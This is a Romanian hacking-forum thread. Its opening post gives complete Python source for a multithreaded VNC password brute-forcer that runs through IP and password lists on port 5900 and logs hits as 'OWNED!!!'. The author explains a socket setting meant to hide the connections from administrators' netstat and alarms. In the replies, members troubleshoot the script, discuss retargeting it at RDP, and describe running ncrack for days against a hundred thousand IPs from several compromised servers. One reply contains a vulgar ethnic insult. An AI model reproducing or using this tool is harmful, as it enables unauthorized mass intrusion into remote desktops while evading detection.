Elohim Posted February 24, 2014 Report Share Posted February 24, 2014 Bun, intai sa incep prin a explica o problema des intalnita in majoritatea programelor open source de pen.testing.Foarte multe, daca nu toate, folosesc blocking sockets.Asta inseamna ca, daca s-a creat o conexiunea cu ip-ul X, dar acesta din diferite motive, refuza sa raspunda, aceea conexiunea o sa stea pornita pana cand a) programul se inchide sau se ajunge la system default timeout error, care de obicei este IMENS.Hydra, medusa, ncrack, pana si nmap vnc-brute.nse, toate au aceeasi problema. Ele nu au fost gandite prost, intr-o oarecare masura, cand iti testezi reteaua, problemele astea nu se intampla. Asa ca o sa folosim non-blocking sockets. Asta inseamna ca daca dupa un numar definit de secunde trece si nu primim niciun raspuns, vom inchide conexiunea. Am setat la 25 de secunde, dar se poate schimba din sursa daca este nevoie.import socket, structfrom Crypto.Cipher import DESfrom sys import exc_info, exit, version_info, maxintimport sysimport Queue, threadingbad = open('bad.txt','w')valid = open('valid.txt','a')err = open('error.txt','w')cracked = []try: with open('valid.txt','rU') as vf: valids = vf.read().splitlines() for val in valids: h1 = val.split(" ")[0] cracked.append(h1)except: passqueue = Queue.Queue(maxsize=4000)with open('ips.txt','rU') as ipf: hosts = ipf.read().splitlines()with open('pass.txt','rU') as pf: passwords = pf.read().splitlines()ThreadNmber = int(sys.argv[1])Verbose = str(sys.argv[2])def gen_key(key): try: newkey = [] for ki in range(len(key)): bsrc = ord(key[ki]) btgt = 0 for i in range(8): if bsrc & (1 << i): btgt = btgt | (1 << 7-i) newkey.append(btgt) if version_info[0] == 2: return ''.join(chr(c) for c in newkey) else: return bytes(newkey) except: passclass VNCBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: host,passwd = self.queue.get() self.checker(host,passwd) self.queue.task_done() def checker(self,host,password): try: if host in cracked: return False s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setblocking(0) s.settimeout(25) s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) s.connect((host,5900)) resp = s.recv(99) version = resp[:11].decode('ascii') if len(resp) > 12: s.close() return False major, minor = version[6], version[10] if (major, minor) in [('3', '8'), ('4', '1')]: proto = b'RFB 003.008\n' elif (major, minor) == ('3', '7'): proto = b'RFB 003.007\n' else: proto = b'RFB 003.003\n' s.sendall(proto) resp = s.recv(99) if minor in ('7', '8'): code = ord(resp[0:1]) if code == 0: s.close() return False s.sendall(b'\x02') resp = s.recv(99) else: code = ord(resp[3:4]) if code != 2: s.close() return False resp = resp[-16:] if len(resp) != 16: s.close() return False sys.stdout.write("\r[+]Trying "+host+' '+password+' ') sys.stdout.flush() pw = password.ljust(8, '\x00')[:8] key = gen_key(pw) des = DES.new(key, DES.MODE_ECB) enc = des.encrypt(resp) s.sendall(enc) resp = s.recv(99) code = ord(resp[3:4]) mesg = resp[8:].decode('ascii', 'ignore') if code == 1: if Verbose == 'v': bad.write(host+'\n') bad.flush() s.close() elif code == 0: valid.write(host+' '+password+'\n') valid.flush() cracked.append(host) print '\rOWNED!!! '+' '+host+' '+password,' ' s.close() else: s.close() return False except Exception, e: err.write(host+'\n') err.flush() passdef main(): try: i = 0 for i in range(ThreadNmber): t = VNCBrute(queue) t.daemon = True t.start() i += 1 except Exception, e: print 'Stopped at',i,'Threads' sys.exit() print i,'Threads spawned' for password in passwords: for host in hosts: queue.put((host,password)) queue.join()print '[+] VNC Brute Force Tool'print '[+] Author: Elohim ' main()Avem o optiune care dupa parerea mea este interesanta. Sa zicem ca nu vrem sa facem prea mare galagie cand folosim programul dupa un alt server. Daca un sysadmin se uita prin numarul de conexiuni, o sa se ingrozeasca ( sau daca are vreun trigger alarm cand se depaseste un anumit numar de outgoing connections )Asa ca am folositsetsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))Asta inseamna ca din moment ce am inchis conexiunea, socket-ul respectiv in loc sa intre in TIME_WAIT state si sa stea 120s cand e default pe majoritatea sistemelor, se v-a inchide abrupt, si dispare din netstat .De asemenea este ajutator cand exista o limita de numarul de porturi efemere folosite (rar )Usage:python vnc.py 100 v/noUnde:100 = Numarul de threaduri. Testat pana la 1400 de threaduri, merge impecabil daca ne permite viteza internetului.v/no = Daca se lasa decat V, si se foloseste doar un user si o parola, se va scrie in fisierul bad.txt DOAR ipurile care chiar ruleaza un soft de vnc, si autentificarea nu a avut success.De ce este folositor ? Am mai dezbatut problema un pic la un script asemanator pentru wordpress. Pe scurt, va scoate ip-urile care nu au nicio treaba cu vnc, dar intamplator au portul 5900 deschis.Daca este lasat cu no, nu va mai face aceasta filtrare. Este necesar decat odata, apoi refolositi ip-urile din bad.txtDaca aveti intrebari, nu ezitati sa le puneti.Sunt satul sa vad oameni care vand asemenea scripturi.Va asigur ca nu este nimic ce poate aduce alt program in plus fata de acesta prezentat.Acopera absolut toate cerintele pentru viteza si eficacitate.Nu dati banii pe prostii, luati la copii lapte = )Spor!P.S. Daca cineva doreste sa discute partea de RFB si problema vnc-urilor care cer si username, astept cu nerabdare sa dezbatem problema. Quote Link to comment Share on other sites More sharing options...
fit. Posted March 5, 2014 Report Share Posted March 5, 2014 Gracias!! Quote Link to comment Share on other sites More sharing options...
poppers13 Posted March 6, 2014 Report Share Posted March 6, 2014 (edited) nu merge , cel putin mie ... Edited March 6, 2014 by poppers13 Quote Link to comment Share on other sites More sharing options...
floris2003 Posted March 6, 2014 Report Share Posted March 6, 2014 @poppers13 Exact la fel se intampla si la mine. Sa fie de la versiunea Python ? Quote Link to comment Share on other sites More sharing options...
Elohim Posted March 6, 2014 Author Report Share Posted March 6, 2014 (edited) Reparati-va indent-urile baieti. Scrie alb pe negru " Inconsistent use of tabs and spaces ".Sau cautati un indent fixer pt python. @poppers13 , este ori v ori no, nu v/no lol. Edited March 6, 2014 by Elohim Quote Link to comment Share on other sites More sharing options...
NOVATu Posted March 8, 2014 Report Share Posted March 8, 2014 Ai ideie @fallen_angel,si mia zis sal inlocuiesc cu asta:' '.join(('\rOWNED', host, password, 80*' '))dar ami da alta eroare mai jos:Syntax Error: except Exception, e:: C:\Python33\vnc.py, line 125, pos 33 Quote Link to comment Share on other sites More sharing options...
Elohim Posted March 8, 2014 Author Report Share Posted March 8, 2014 (edited) @NOVATu , scoate Python 3.3, si instaleaza 2.7Cred ca trebuia sa specific asta in OP, my bad.**mi-a, sa-l, imi Edited March 8, 2014 by Elohim Quote Link to comment Share on other sites More sharing options...
stroici Posted May 14, 2014 Report Share Posted May 14, 2014 Stiu ca poate pare dumb question dar mere sa inlocuiesti 5900 cu 3389? Quote Link to comment Share on other sites More sharing options...
sebywarlord Posted May 14, 2014 Report Share Posted May 14, 2014 @stroici Tu vrei sa faci bruteforce la RDP-uri prin protocolu de VNC ?Daca vrei rdp bruteforce baga hydra/ncrack/medusa Quote Link to comment Share on other sites More sharing options...
stroici Posted May 14, 2014 Report Share Posted May 14, 2014 Dap, eram sigur ca protocolu' e buba Le-am incercat pe toate 3. Cum vin ele by default sunt muci ... cel putin pentru partea de RDP.Si am pus un passfile decent pe suta de mii de ip, lasat cateva zile, pe mai multe rooturi. Deci, praf.Ncracku cel putin dupa o zi deja cam pare sa se blocheze. In plus sunt toate greu de pus, le trebe gcc si au multe fisiere. Kk portabilitate ... Quote Link to comment Share on other sites More sharing options...
sebywarlord Posted May 14, 2014 Report Share Posted May 14, 2014 Eu sunt multumit de ncrack ,dar nu ii dau lista de IP-uri ca merge greu ca naiba , ii dau cate un ip pe rand si un script in C le porneste dintr-o lista,cate 30 sesiuni deodata ,merge bine ,prinde bine plm Quote Link to comment Share on other sites More sharing options...
Kulls Posted June 3, 2014 Report Share Posted June 3, 2014 Dans ce forum, il n'y aurai pas des français par hasard ? Non, comme ça parceque tous les membres postant un message, on va dire que je comprend pas ce qu'ils disent. Je vois un peu d'anglais dans les quelques messages que j'a pu lire et le reste je comprend pas ! Désolé! :s Quote Link to comment Share on other sites More sharing options...
Elohim Posted June 3, 2014 Author Report Share Posted June 3, 2014 Dans ce forum, il n'y aurai pas des français par hasard ? Non, comme ça parceque tous les membres postant un message, on va dire que je comprend pas ce qu'ils disent. Je vois un peu d'anglais dans les quelques messages que j'a pu lire et le reste je comprend pas ! Désolé! :sRoumains baisent les français dans le cul. Allez dans le vagin de vous mère Quote Link to comment Share on other sites More sharing options...
Rikudo Posted June 3, 2014 Report Share Posted June 3, 2014 Roumains baisent les français dans le cul. Allez dans le vagin de vous mèreOuf ouf. Quote Link to comment Share on other sites More sharing options...
StereoONLINE Posted July 9, 2014 Report Share Posted July 9, 2014 De unde fac si eu rost de crypto.cipher module pt 2.7 ? Quote Link to comment Share on other sites More sharing options...
Ganav Posted July 9, 2014 Report Share Posted July 9, 2014 (edited) De unde fac si eu rost de crypto.cipher module pt 2.7 ?In Ubuntu poti rula:sudo apt-get install python-cryptoIn CentOS(>= 6.6):sudo yum install python-crypto Verifica intai daca ai urmatoarele dependente rezolvate:Ubuntu – Details of package python-crypto in precise Edited February 17, 2015 by Ganav 1 Quote Link to comment Share on other sites More sharing options...
Elohim Posted July 9, 2014 Author Report Share Posted July 9, 2014 Daca ai erori de genul asta, mai bine instalezi python 2.7 decat sa te apuci sa il carpesti Quote Link to comment Share on other sites More sharing options...
Chameleon. Posted July 22, 2014 Report Share Posted July 22, 2014 interesant... Quote Link to comment Share on other sites More sharing options...
alexandruth Posted July 22, 2014 Report Share Posted July 22, 2014 interesant...Omule, nu ?tii cum s? î?i faci mai multe post?ri? Quote Link to comment Share on other sites More sharing options...
TheOne Posted July 22, 2014 Report Share Posted July 22, 2014 Omule, nu ?tii cum s? î?i faci mai multe post?ri? Avea nevoie de 10 posturi pentru a face o CERERE ) Quote Link to comment Share on other sites More sharing options...
zeroabsolut Posted November 22, 2015 Report Share Posted November 22, 2015 ma ajuta si pe mine cineva cu implementarea ca nu reusesc. Quote Link to comment Share on other sites More sharing options...